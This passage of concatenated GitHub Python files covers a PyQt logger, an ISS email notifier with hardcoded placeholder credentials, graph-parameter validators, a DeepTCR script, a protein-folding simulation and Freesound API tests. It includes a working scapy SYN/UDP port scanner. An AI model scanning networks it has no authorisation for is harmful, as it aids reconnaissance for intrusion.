datetime.today().strftime('%H:%M:%S.%f')[:-3]\n\n self.ui.system_log_table.setRowCount(self.ui.system_log_table.rowCount() + 1)\n self.ui.system_log_table.setItem(self.ui.system_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.system_log_table.setItem(self.ui.system_log_table.rowCount() - 1, 1, QTableWidgetItem(log))\n self.ui.system_log_table.scrollToBottom()\n\n def data_log(self, temp_log, gas_log):\n\n time_str = datetime.today().strftime('%H:%M:%S.%f')[:-3]\n temp_item = ', '.join([str(data) for data in temp_log][1:])\n gas_item = ', '.join([str(data) for data in gas_log][1:])\n\n self.ui.temp_data_log_table.setRowCount(self.ui.temp_data_log_table.rowCount() + 1)\n self.ui.gas_data_log_table.setRowCount(self.ui.gas_data_log_table.rowCount() + 1)\n self.ui.temp_data_log_table.setItem(self.ui.temp_data_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.gas_data_log_table.setItem(self.ui.gas_data_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.temp_data_log_table.setItem(self.ui.temp_data_log_table.rowCount() - 1, 1, QTableWidgetItem(temp_item))\n self.ui.gas_data_log_table.setItem(self.ui.gas_data_log_table.rowCount() - 1, 1, QTableWidgetItem(gas_item))\n if self.ui.temp_data_log_table.rowCount() > 20:\n self.ui.temp_data_log_table.removeRow(0)\n if self.ui.gas_data_log_table.rowCount() > 20:\n self.ui.gas_data_log_table.removeRow(0)\n self.ui.temp_data_log_table.scrollToBottom()\n self.ui.gas_data_log_table.scrollToBottom()","repo_name":"yawayo/Fire_Hazard_Response_Program","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":79883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32578561736","text":"#! 
/usr/bin/python\n\nimport sys\nimport logging\nfrom scapy.layers.inet import *\nimport threading\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR) # This is supress scapy warnings\nconf.verb = 0\nconf.nofilter = 1\nglobal verbose_mode\n\n\nclass Port:\n def __init__(self, type, port):\n self.type = type\n self.port = port\n\n\ndef syn_tcp_is_open(ip, port, timeout):\n src_port = RandShort()\n result = sr1(IP(dst=ip) / TCP(sport=src_port, dport=port, flags=\"S\"), timeout=timeout)\n if result is None:\n return False, -1\n elif result.haslayer(TCP) and result.getlayer(TCP).flags == 0x12:\n return True, result.time\n else:\n return False, -1\n\n\ndef udp_is_open(ip, port, timeout):\n result = sr1(IP(dst=ip) / UDP(dport=port), timeout=timeout)\n if result is None:\n return False, -1\n elif result.haslayer(UDP):\n return True, result.time\n else:\n return False, -1\n\n\ndef start(ip, ports, timeout):\n global verbose_mode\n\n for port in ports:\n if port.type == 'UDP':\n is_open, tm = udp_is_open(ip, port.port, timeout)\n else:\n is_open, tm = syn_tcp_is_open(ip, port.port, timeout)\n\n if is_open and verbose_mode and port.type == 'TCP':\n print(f\"{port.type} {port.port} {tm}\")\n elif is_open:\n print(f\"{port.type} {port.port}\")\n\n\ndef main():\n global verbose_mode\n OPTIONS = [i for i in sys.argv if '-' in i]\n\n timeout_options = [i for i in OPTIONS if '--timeout' in i]\n timeout = 2\n\n if len(timeout_options) == 1:\n t_opt = timeout_options[0]\n timeout = int(t_opt.split('=')[1])\n\n vm_options = [i for i in OPTIONS if '--verbose' in i or '-v' in i]\n if len(vm_options) == 1:\n verbose_mode = True\n else:\n verbose_mode = False\n\n IND_IP = 1\n for i in range(len(sys.argv[1:])):\n ind = i + 1\n if '-' not in sys.argv[ind]:\n IND_IP = int(ind)\n break\n ip = sys.argv[IND_IP]\n\n PORTS = []\n\n for x in sys.argv[IND_IP+1:]:\n type_connect, input_ports = x.split('/')[0], x.split('/')[1]\n if ',' in input_ports:\n ports = [int(i) for i in input_ports.split(',')]\n if type_connect == 'tcp':\n PORTS += [Port('TCP', i) for i in ports]\n elif type_connect == 'udp':\n PORTS += [Port('UDP', i) for i in ports]\n elif '-' in input_ports:\n start_port, end_port = int(input_ports.split('-')[0]), int(input_ports.split('-')[1])\n if type_connect == 'tcp':\n for i in range(start_port, end_port + 1):\n PORTS.append(Port('TCP', i))\n elif type_connect == 'udp':\n for i in range(start_port, end_port + 1):\n PORTS.append(Port('UDP', i))\n else:\n if type_connect == 'tcp':\n PORTS.append(Port('TCP', int(input_ports)))\n elif type_connect == 'udp':\n PORTS.append(Port('UDP', int(input_ports)))\n\n num_threads_options = [i for i in OPTIONS if '--num-threads' in i or '-j' in i]\n num_threads = 1\n\n if len(num_threads_options) == 1:\n t_opt = num_threads_options[0]\n num_threads = int(t_opt.split('=')[1])\n\n count_ports_in_thread = int(len(PORTS) / num_threads)\n\n first_port = 0\n for i in range(num_threads - 1):\n threading.Thread(target=start, args=(ip, PORTS[first_port:first_port+count_ports_in_thread], timeout)).start()\n first_port = (i + 1) * count_ports_in_thread\n threading.Thread(target=start, args=(ip, PORTS[first_port:], timeout)).start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NikitaUnisikhin/Port-Scanner","sub_path":"portscan.py","file_name":"portscan.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32973623209","text":"import requests\nimport 
smtplib\nimport time\nfrom datetime import datetime\n\nMY_LAT = 36.609554\nMY_LONG = 127.515285\nMY_EMAIL = 'thisisid@gmail.com'\nMY_PASSWORD = 'thisispassword'\n\ndef isOverhead():\n    response = requests.get(url='http://api.open-notify.org/iss-now.json')\n    response.raise_for_status()\n    data = response.json()\n\n    iss_lat = float(data['iss_position']['latitude'])\n    iss_long = float(data['iss_position']['longitude'])\n\n    if MY_LAT - 5 <= iss_lat <= MY_LAT + 5 and MY_LONG - 5 <= iss_long <= MY_LONG + 5:\n        return True\n\ndef isNight():\n    parameters = {\n        'lat': MY_LAT,\n        'lng': MY_LONG,\n        'formatted': 0,\n    }\n\n    # sunrise/sunset come from the sunrise-sunset.org API (formatted=0 returns ISO 8601 strings)\n    response = requests.get(url='https://api.sunrise-sunset.org/json', params=parameters)\n    response.raise_for_status()\n    data = response.json()\n\n    sunrise = int(data['results']['sunrise'].split('T')[1].split(':')[0])\n    sunset = int(data['results']['sunset'].split('T')[1].split(':')[0])\n\n    time_now = datetime.now().hour\n    if time_now >= sunset or time_now <= sunrise:\n        return True\n\nwhile True:\n    time.sleep(60)\n    if isOverhead() and isNight():\n        connection = smtplib.SMTP('smtp.gmail.com')\n        connection.starttls()\n        connection.login(MY_EMAIL, MY_PASSWORD)\n        connection.sendmail(\n            from_addr=MY_EMAIL,\n            to_addrs=MY_EMAIL,\n            msg='Subject:Look up ISS\\n\\nISS is above you in the sky.\\nISS 위성이 당신의 머리 위 밤하늘에 지나가고 있습니다.'\n        )","repo_name":"pokavv/SimplePython","sub_path":"track_iss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71389141921","text":"\"\"\"Classes that check the values in the dictionary included in the code\"\"\"\n\nimport copy\nimport json\n\nfrom .constants import CATEGORICAL_SCHEMES, ORDERED_SCHEMES\n\n\nclass DictKWS:\n    def __init__(self):\n        self.kws = {}\n\n    def __repr__(self):\n        aux = copy.deepcopy(self.kws)\n        for attr, value in self.__dict__.items():\n            if attr != \"kws\":\n                aux.update(value.kws)\n\n        return json.dumps(aux)\n\n\nclass LegendHoverKws(DictKWS):\n    def __init__(self, legend_kws):\n        super().__init__()\n        self.kws = {\n            \"show\": True,\n            \"scale_size\": 1,\n            \"color_source_hovered\": \"#2c7bb6\",\n            \"color_target_hovered\": \"#d7191c\",\n        }\n        self.kws.update(legend_kws)\n\n\nclass NodeCircleKws(DictKWS):\n    def __init__(self, node_kws, dataset):\n        super().__init__()\n        self.kws = {\"tooltip\": None, \"hover\": True}\n        self.color = ColorAttribute(dataset, node_kws)\n        self.size = SizeAttribute(dataset, node_kws)\n        for key in node_kws:\n            if key in self.kws:\n                self.kws[key] = node_kws[key]\n\n\nclass LinkRectKws(DictKWS):\n    def __init__(self, node_kws, dataset):\n        super().__init__()\n        self.kws = {\n            \"tooltip\": None,\n            \"hover\": True,\n            \"hover_rect_color\": \"#dbdbdb\",\n            \"hover_text_color\": \"red\",\n        }\n        self.color = ColorAttribute(dataset, node_kws)\n        for key in node_kws:\n            if key in self.kws:\n                self.kws[key] = node_kws[key]\n\n\nclass LinkLineKws(DictKWS):\n    def __init__(self, node_kws, dataset):\n        super().__init__()\n        self.kws = {\"tooltip\": None, \"stroke_width\": None, \"hover\": True}\n        self.color = ColorAttribute(dataset, node_kws)\n        for key in node_kws:\n            if key in self.kws:\n                self.kws[key] = node_kws[key]\n\n\nclass SizeAttribute:\n    def __init__(self, dataset, node_kws) -> None:\n        self.kws = {\n            \"size_attribute\": None,\n            \"size_scale_type\": \"lineal\",\n            \"size_default\": None,\n            \"scale_domain_function\": None,\n            \"scale_range_function\": [2, 5],\n        }\n        for key in node_kws:\n            if key in self.kws:\n                self.kws[key] = 
node_kws[key]\n\n self.check_size(dataset)\n\n def check_size(self, dataset):\n node_kws = self.kws\n attr = node_kws[\"size_attribute\"]\n size_d_extreme = node_kws[\"scale_domain_function\"]\n if attr is None or node_kws[\"size_default\"] is not None:\n return\n\n assert node_kws[\"size_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"size_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n\n assert isinstance(\n node_kws[\"scale_range_function\"], list\n ), \"scale_range_function should be an array with integers or floats\"\n\n for d in node_kws[\"scale_range_function\"]:\n assert isinstance(\n d, (int, float)\n ), \"Every element in scale_range_function should be int or float\"\n\n for node in dataset[\"nodes\"]:\n assert (\n attr in node\n ), \"All nodes should contain the attribute defined in size_attribute\"\n assert isinstance(\n node[attr], (int, float)\n ), \"The attribute should be and integer or float\"\n\n if size_d_extreme is not None:\n assert len(size_d_extreme) == len(\n node_kws[\"scale_range_function\"]\n ), \"scale_domain_function and scale_range_function should have the same lenght\"\n for d in size_d_extreme:\n assert isinstance(\n d, (int, float)\n ), \"if scale_domain_function is not None, every element in scale_domain_function should be int or float\"\n else:\n assert (\n len(node_kws[\"scale_range_function\"]) == 2\n ), \"if scale_domain_function is None, scale_range_function should be an array with 2 elements\"\n\n\nclass ColorAttribute:\n def __init__(self, dataset, node_kws) -> None:\n self.kws = {\n \"color_attribute\": None,\n \"color_attribute_type\": \"categorical\",\n \"color_scale_type\": \"lineal\", # Only for numerical\n \"color_scheme\": None,\n \"color_domain_function\": None, # num: [min, max] - ord/cat: None or list of uniques values\n \"color_default\": None,\n \"color_unknown\": None,\n }\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n if self.kws[\"color_scheme\"] is None:\n self.kws[\"color_scheme\"] = (\n \"Tableau10\"\n if self.kws[\"color_attribute_type\"] == \"categorical\"\n else \"Blues\"\n )\n\n self.check_color(dataset)\n\n def check_color(self, dataset):\n node_kws = self.kws\n if node_kws[\"color_attribute\"] is None:\n return\n\n color_d_function = node_kws[\"color_domain_function\"]\n if color_d_function is None:\n assert (\n node_kws[\"color_unknown\"] is None\n ), \"Only define color_unknown if you define color_domain_function\"\n\n assert node_kws[\"color_attribute_type\"] in [\n \"numerical\",\n \"categorical\",\n \"ordinal\",\n ], \"size_scale_type should be 'numerical', 'categorical' or 'ordinal'\"\n if node_kws[\"color_attribute_type\"] == \"numerical\":\n assert node_kws[\"color_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"color_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n assert node_kws[\"color_scheme\"] in ORDERED_SCHEMES\n\n assert (\n color_d_function is None or len(color_d_function) == 2\n ), \"If color_attribute_type is numerical, color_domain_function should be None or array with 2 element\"\n\n elif node_kws[\"color_attribute_type\"] == \"categorical\":\n assert node_kws[\"color_scheme\"] in CATEGORICAL_SCHEMES\n\n else: # node_kws[\"color_attribute_type\"] == \"ordinal\":\n assert node_kws[\"color_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"color_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n assert node_kws[\"color_scheme\"] in ORDERED_SCHEMES\n\n for node in 
dataset[\"nodes\"]:\n assert (\n node_kws[\"color_attribute\"] in node\n ), \"All nodes should contain the attribute defined in color_attribute\"\n","repo_name":"Hernan4444/PyNetworkD3","sub_path":"PyNetworkD3/kws.py","file_name":"kws.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33486291480","text":"from PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom V4 import Ui_MainWindow\nimport sys\nimport pyqtgraph as pg\nimport time\nimport cv2\n\nimport requests\nurl = \"https://monitor.icmems.ml/api/getDatas\"\n# print(getjsons.json())\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setUp()\n # ComboBox1\n self.ui.comboBox1.addItems(self.section)\n # self.ui.comboBox1.currentIndexChanged.connect(self.display)\n self.ui.comboBox1.currentIndexChanged\n # ComboBox2\n self.ui.comboBox2.addItems(self.sensors)\n self.ui.comboBox2.currentIndexChanged.connect(self.changeFollowBedDisplay)\n # checkBox1\n self.ui.checkBox1.stateChanged.connect(self.show_Features)\n # checkBox2\n self.ui.checkBox2.stateChanged.connect(self.show_Features)\n # checkBox3\n self.ui.checkBox3.stateChanged.connect(self.show_Features)\n self.changeFollowBedDisplay()\n # self.getFixFointData()\n self.timer = QtCore.QTimer()\n self.timer.setInterval(120*1000)\n # self.timer.timeout.connect(self.changeFollowBedDisplay, self.getFixFointData)\n self.timer.timeout.connect(self.changeFollowBedDisplay)\n self.timer.start()\n\n def setUp(self):\n # MainWindow Title\n self.setWindowTitle('蘭花微氣候監測系統')\n # label1\n self.ui.label1.setText('第六區監測')\n # label2\n self.ui.label2.setText('隨床監測:')\n # groupBox\n self.ui.groupBox.setTitle('第六區')\n # global checkBoxes\n self.checkBoxes = [self.ui.checkBox1, self.ui.checkBox2, self.ui.checkBox3]\n # ComboBox1\n self.section = ['第六區']\n # ComboBox2\n self.sensors = ['F1', 'F2', 'F3', 'F4', 'F5', 'F6',]\n # checkBox1\n self.ui.checkBox1.setText('溫度 (Temp)')\n # checkBox2\n self.ui.checkBox2.setText('濕度 (Humid)')\n # checkBox3\n self.ui.checkBox3.setText('光照量 (micromol)')\n # time\n self.time = time.time()\n # label-'voltage_meter'\n self.ui.voltage_meter.setText('電池更換警示')\n # label-'update_time'\n self.ui.update_time.setText('上次更新時間:')\n # graphicsView_2 setting\n self.para_names = ['temperature', 'humidity', 'light']\n self.colors = [\"#D3D4\", \"#4B88A2\", \"#BB0A21\"]\n labelStyle = {'color': '#000000', 'font-size': '14pt'}\n self.ui.graphicsView_2.setLabel('left', \"Temperature & RH\", units='Celsius & %', **labelStyle)\n self.ui.graphicsView_2.setLabel('right', \"PAR\", units='micro mol', **labelStyle)\n # self.ui.graphicsView_2.setLabel('bottom', \"Date\", units='', **labelStyle)\n self.ui.graphicsView_2.setBackground('w')\n # graphicsView setting\n self.fixedsensors = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n\n\n def changeFollowBedDisplay(self):\n followBed = self.ui.comboBox2.currentText()\n # print(followBed[1])\n dataUrl = url+\"/9\"+followBed[1]\n getjsons = requests.get(dataUrl).json()\n # print(dataUrl)\n \n self.temp = []\n self.humid = []\n self.light = []\n self.timestamp = []\n for n in range(len(getjsons['data'][-288*5:])):\n self.temp.append(getjsons['data'][n-288*5]['temperature'])\n self.humid.append(getjsons['data'][n-288*5]['wetness'])\n 
self.light.append(getjsons['data'][n-288*5]['par'])\n self.timestamp.append(getjsons['data'][n-288*5]['time'])\n print(len(self.timestamp))\n print(len(self.temp))\n print(len(self.humid))\n print(len(self.light))\n print(self.time)\n self.paras = [self.temp, self.humid, self.light]\n self.show_Features()\n # Time~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n self.the_last_unixTC = getjsons['data'][-1]['time']/1000\n self.struct_time = time.localtime(self.the_last_unixTC)\n # print(type(self.the_last_unixTC))\n self.date_form = time.strftime(\"%Y-%m-%d %H:%M:%S\", self.struct_time)\n print(type(self.date_form))\n self.ui.update_time.setText('上次更新時間:{}'.format(self.date_form))\n # Time~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def show_Features(self):\n self.ui.graphicsView_2.clear()\n for n in range(len(self.checkBoxes)):\n if self.checkBoxes[n].isChecked():\n # self.checkBoxes[n].setBackground(self.colors[n])\n print(\"add {} feature\".format(self.para_names[n]))\n self.ui.graphicsView_2.plot(self.timestamp, self.paras[n], pen=pg.mkPen(color=self.colors[n], width=3))\n # self.ui.graphicsView_2.setXRange(self.time-24*60*60*3, self.time)\n pg.QtGui.QApplication.processEvents()\n\n # def getFixFointData(self):\n # self.all_latest_temp = []\n # self.all_latest_humid = []\n # self.all_latest_light = []\n # self.ui.graphicsView.clear()\n # for n in self.fixedsensors:\n # fixdataURL = url+\"/\"+self.fixedsensors[n]\n # fixdata_getjsons = requests.get(fixdataURL).json()\n # self.all_latest_temp.append(fixdata_getjsons['data'][-1]['temperature'])\n # self.all_latest_humid.append(fixdata_getjsons['data'][-1]['wetness'])\n # self.all_latest_light.append(fixdata_getjsons['data'][-1]['par'])\n \n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"chengzee/disease_predict","sub_path":"orchid_DiseasePredict/pyqt-tutorial/mainV2.py","file_name":"mainV2.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41654011114","text":"'''\nThis script takes a model fit to distinguish AB1 from RENCA TCRs on timepoint 0 and assesses the predictive signature at timepoints 2,4,6.\n'''\nfrom DeepTCR.DeepTCR import DeepTCR_WF\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\ndf = pd.read_csv('../data/data.tsv',sep='\\t')\ndf['Sample_ID'] = 'Model'+'_'+ df['Model'] +\\\n '_'+ 'Mouse' +'_'+df['Mouse'].astype(str) + \\\n '_' + 'Timepoint'+'_'+df['Timepoint'].astype(str)\n\ndf_count = df.groupby(['Sample_ID']).agg({'count':'sum'}).reset_index()\ncount_dict = dict(zip(df_count['Sample_ID'],df_count['count']))\ndf['count_sum'] = df['Sample_ID'].map(count_dict)\ndf['count_sum'] = df['count_sum'].astype(int)\ndf['freq'] = df['count']/df['count_sum']\n\ntimepoint_train = 0\n\nDFs = []\nfor timepoint_inf in [2,4,6]:\n df_sel = df[df['Timepoint'] == timepoint_inf]\n beta_sequences = np.array(df_sel['CDR3'])\n v_beta = np.array(df_sel['v_gene'])\n j_beta = np.array(df_sel['j_gene'])\n counts = np.array(df_sel['count'])\n sample_labels = np.array(df_sel['Sample_ID'])\n class_labels = np.array(df_sel['Model'])\n\n DTCR = DeepTCR_WF('model_'+str(timepoint_train))\n DTCR.Sample_Inference(sample_labels=sample_labels,\n beta_sequences=beta_sequences,\n v_beta=v_beta,\n j_beta=j_beta,\n counts=counts,\n 
models=['model_' + str(x) for x in np.random.choice(25, 10, replace=False)])\n\n df_label = df_sel[['Sample_ID','Model']].drop_duplicates()\n label_dict = dict(zip(df_label['Sample_ID'],df_label['Model']))\n df_pred = DTCR.Inference_Pred_Dict['AB1'][:]\n df_pred['Model'] = df_pred['Samples'].map(label_dict)\n df_pred['Model_bin'] = 0\n df_pred['Model_bin'][df_pred['Model']=='AB1']=1\n DFs.append(df_pred)\n\nfig,ax = plt.subplots()\nfor df_pred,timepoint_inf in zip(DFs,[2,4,6]):\n roc_score = roc_auc_score(df_pred['Model_bin'],df_pred['Pred'])\n fpr,tpr,_ = roc_curve(df_pred['Model_bin'],df_pred['Pred'])\n plt.plot(fpr,tpr,lw=2,label='%s (area = %0.4f)' % (str(timepoint_inf), roc_score))\nplt.xlabel('False Positive Rate',fontsize=16)\nplt.ylabel('True Positive Rate',fontsize=16)\nplt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\nplt.legend(loc='lower right')\nplt.tight_layout()\n\nDFs = pd.concat(DFs)\nDFs.to_csv('Supp4B.csv',index=False)\n","repo_name":"22461922Joel/Murine-tumour-dynamics-DeepTCR-2022","sub_path":"scripts/inf_model.py","file_name":"inf_model.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70137638883","text":"import screen\nimport objects\n#In Game Variables\nGRAVITY = 1\nFRICTION = 1\nDEFAULT_FLOOR_LEVEL = screen.HEIGHT - 5\nFLOOR_LEVEL = DEFAULT_FLOOR_LEVEL\n\nFLOOR_LEVEL_LIST = []\n\ndef update_floor_height():\n level_list = [[DEFAULT_FLOOR_LEVEL] for i in range(screen.WIDTH)]\n for surface in objects.STATIC_LIST:\n surface_range = surface.get_walkable_surface()\n for pixel in range(surface_range[0], surface_range[1]):\n try:\n if surface.y not in level_list[pixel]:\n level_list[pixel].append(surface.y)\n except IndexError:\n continue\n return level_list\n\nfor pixel in range(screen.WIDTH):\n FLOOR_LEVEL_LIST.append([DEFAULT_FLOOR_LEVEL])\n\nupdate_floor_height()","repo_name":"LewPort/Hard2Get","sub_path":"levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7335120230","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 26 10:34:09 2018\n\n@author: John\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom numba import jit\nimport math\n\nnp.set_printoptions(threshold=np.nan)\n\n\n\n\n\nT = 10\nN = 15\nMCS = 10000000\n\n\n# Interaction energies between different types of acids\n# Interaction energy between type i and type j is J[i, j]\nJ = np.random.uniform(-4, -2, size=(20, 20))\nJ = np.hstack((np.zeros((J.shape[0],1)),J)) # Type 0 doesn't exist, has an interaction energy\nJ = np.vstack((np.zeros((1,J.shape[1])),J)) # of 0 with every type\n\n\n# Initially, no acids are non-bonded nearest-neighbours\nE_chain = 0\n\n\n# Make 2N by 2N lattice to ensure that the protein has rooom to fold\nlattice = np.zeros(shape=(2*N,2*N), dtype=int)\n\n\n# The type of each acid in the chain\ntypes = np.random.randint(1, 21, size=N, dtype=int)\n\n\n# Create x and y coordinates such that the chain will be horizontal, and centered in the 2N x 2N lattice\nx_start = int(N/2)\nx_end = int(3*N/2)\npos_xs = np.arange(x_start, x_end, dtype=int)\npos_ys = np.empty(N, dtype=int); pos_ys.fill(N)\n\n\n# Zip type, x_pos, and y_pos to create array defining each acid (this is the protein)\nA = np.empty(shape=(N,3), dtype=int)\nfor i in range(A.shape[0]):\n A[i] = np.array([types[i], pos_xs[i], pos_ys[i]])\n \n \n \n# Put 
protein on lattice\nlattice[N, x_start:x_end] = types\n\n\n# Pre-select random acid and neighbour picks for better performance\nacid_picks = np.random.randint(0, A.shape[0], size=MCS) # 1 acid picked from A each MCS\ncurr_acid_pick = 0\n\nneigh_picks = np.random.randint(0, 4, size=MCS) # 1 acid picked from A each MCS\ncurr_neigh_pick = 0\n\nprob_picks = np.random.uniform(0, 1, size=MCS)\ncurr_prob_pick = 0\n\n#left-down, left-up, right-up, right-down\nmove_neighs = np.array([(-1,1), (-1,-1), (1,-1), (1,1)], dtype=int)\n\n\n\n\n@jit\ndef get_neighbours(x, y):\n left = (x-1, y) if not x == 0 else None\n bottom = (x, y+1) if not y == lattice.shape[1]-1 else None\n right = (x+1, y) if not x == lattice.shape[0]-1 else None\n top = (x, y-1) if not y == 0 else None\n \n return [left, bottom, right, top]\n\n\n@jit\ndef energy(a_type, x, y, partners):\n \n neighbours = get_neighbours(x, y)\n \n #print(\"\\nEnergy:\\nFor \" + str(x) + \", \" + str(y))\n \n E = 0\n for neigh in neighbours:\n \n if neigh not in partners:\n \n #print(str(neigh) + \" \" + str(lattice[neigh[1], neigh[0]]))\n \n neigh_type = lattice[neigh[1], neigh[0]] # SLOW\n E += J[a_type, neigh_type]\n \n #print(\"E: \" + str(E))\n return E\n\n\n\n\n# Selects one acid, determines the change in energy from moving that acid, then either moves it or doesn't\n#@jit\ndef sweep(acid_index, neigh_index, prob_index): \n \n #global A \n #global E_chain\n \n # Randomly select one acid in the chain\n acid_pos = acid_picks[acid_index]\n \n print(acid_pos)\n \n acid = A[acid_pos]\n acid_x = acid[1]\n acid_y = acid[2]\n \n print(acid)\n \n #print(\"Selected acid: \" + str(acid))\n \n \n # Determine the acids the currently examined acid is bonded to \n first_partner = tuple(A[acid_pos-1, 1:]) if not acid_pos == 0 else None\n second_partner = tuple(A[acid_pos+1, 1:]) if not acid_pos == len(A)-1 else None\n partners = (first_partner, second_partner)\n \n #print(\"Partners: \" + str(partners))\n \n \n # Randomly select a nearest neighbour to move to\n neigh_type = neigh_picks[neigh_index]\n \n neigh_offset = move_neighs[neigh_type]\n \n neigh_pos = (acid_x+neigh_offset[0], acid_y+neigh_offset[1]) # creating a tuple is faster than assigning a list\n \n #print(\"Proposed new position: \" + str(neigh_pos))\n \n \n # Determine if acid can move to selected position without breaking bonds \n can_move = True\n \n if lattice[neigh_pos[1], neigh_pos[0]] != 0:\n can_move = False\n \n else:\n for partner in partners:\n if partner is None:\n continue\n elif not (abs(partner[0] - neigh_pos[0]) + abs(partner[1] - neigh_pos[1]) == 1):\n can_move = False\n \n #print(can_move)\n \n energy(acid[0], acid[1], acid[2], partners)\n \n if can_move:\n 1\n \n E_i = energy(acid[0], acid_x, acid_y, partners)\n E_f = energy(acid[0], neigh_pos[0], neigh_pos[1], partners)\n delta_E = E_f-E_i\n #print(\"\\nDELTA_E: \" + str(delta_E))\n \n if delta_E < 0 or prob_picks[prob_index] < math.exp(delta_E/T):\n #print(\"Moving from (\" + str(acid_x) + \", \" + str(acid_y) + \") to (\" + str(neigh_pos[0]) + \", \" + \n #str(neigh_pos[1]) + \")\")\n lattice[acid_y, acid_x] = 0\n lattice[neigh_pos[1], neigh_pos[0]] = acid[0]\n A[acid_pos] = [acid[0], neigh_pos[0], neigh_pos[1]]\n \n #blank = E_chain\n \n #E_chain += delta_E\n \n #print(\"changed A at \" + str(acid_pos))\n #print(A)\n\n # Show the protein on the lattice\n #plt.imshow(lattice)\n #plt.show()\n \n #return A\n \n \n \n \n\nfor i in range(10):\n print(A)\n sweep(curr_acid_pick, curr_neigh_pick, curr_prob_pick)\n curr_acid_pick += 
1\n curr_neigh_pick += 1\n curr_prob_pick += 1\n \n# Show the protein on the lattice\n#plt.imshow(lattice)\n#plt.show()","repo_name":"JohnPHealey/protein-folding","sub_path":"protein_folding.py","file_name":"protein_folding.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8966107710","text":"# Task :\n#\n# Find the occurence of each element in the list\n\nif __name__ == '__main__':\n\n my_list = []\n count = 1\n n = int(input('Enter List Size : '))\n\n for i in range(n):\n num = int(input('Enter Number : '))\n my_list.append(num)\n\n my_list.sort()\n\n for i in range(n-1):\n if(my_list[i] == my_list[i+1]):\n count += 1\n else:\n print(my_list[i],'occurs', count,'times')\n count=1\n","repo_name":"NeeleshVashist/Python-Practice","sub_path":"Class Questions/Occurance Finder.py","file_name":"Occurance Finder.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17218597244","text":"#\n# Freesound is (c) MUSIC TECHNOLOGY GROUP, UNIVERSITAT POMPEU FABRA\n#\n# Freesound is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# Freesound is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n# Authors:\n# See AUTHORS file.\n#\nfrom django.test import TestCase, SimpleTestCase, RequestFactory\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.sites.models import Site\n\nfrom apiv2.models import ApiV2Client\nfrom apiv2.apiv2_utils import ApiSearchPaginator\nfrom apiv2.serializers import SoundListSerializer, DEFAULT_FIELDS_IN_SOUND_LIST, SoundSerializer\nfrom forms import SoundCombinedSearchFormAPI\nfrom sounds.models import Sound\nfrom utils.test_helpers import create_user_and_sounds\n\nfrom exceptions import BadRequestException\n\n\nclass TestAPiViews(TestCase):\n fixtures = ['licenses']\n\n def test_pack_views_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n for sound in sounds:\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n # Login so api returns session login based responses\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on pack instance\n resp = 